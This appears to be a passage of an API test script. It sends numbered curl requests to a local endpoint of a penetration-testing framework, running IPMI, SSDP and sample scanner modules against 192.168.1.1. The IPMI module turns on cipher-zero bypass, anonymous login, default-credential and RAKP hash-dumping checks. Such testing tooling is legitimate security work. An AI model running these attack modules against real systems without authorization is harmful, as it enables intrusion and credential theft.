      "enable_delete": "n",
      "enable_extended_methods": "n",
      "modules": "1",
      "concurrency": "10",
      "timeout": "10",
      "endpoint_source": "1",
      "endpoint_file": "/tmp/endpoints.txt"
    }
  }' | python3 -m json.tool

# ─── 30. IPMI Enum/Exploit ──────────────────────────────────────
curl -s --max-time 60 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "scanners/ipmi_enum_exploit",
    "target": "192.168.1.1",
    "prompts": {
      "mode": "1",
      "target": "192.168.1.1",
      "port": "623",
      "test_cipher_zero": "y",
      "test_anonymous": "y",
      "test_default_creds": "y",
      "test_rakp_hash": "y",
      "concurrency": "1",
      "output_file": "ipmi_scan_results.csv"
    }
  }' | python3 -m json.tool

# ─── 31. SSDP MSearch Scanner ───────────────────────────────────
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "scanners/ssdp_msearch",
    "target": "192.168.1.1",
    "prompts": {
      "port": "1900",
      "timeout": "5",
      "retries": "2",
      "verbose": "y",
      "save_results": "y",
      "search_target": "ssdp:all"
    }
  }' | python3 -m json.tool

# ─── 32. Sample Scanner ────────────────────────────────────────
curl -s --max-time 30 -X POST http://127.0.0.1:8080/api/run \
  -H 'Authorization: Bearer testkey123' \
  -H 'Content-Type: application/json' \
  -d '{
    "module": "scanners/sample_scanner",
    "target": "192.168.1.1",
    "prompts": {
      "timeout": "5",
      "check_http": "y",
      "check_https": "y",
      "verbose": "n",
      "save_results": "y",
      "output_file": "sample_scan.txt"
    }
  }' | python3 -m json.tool
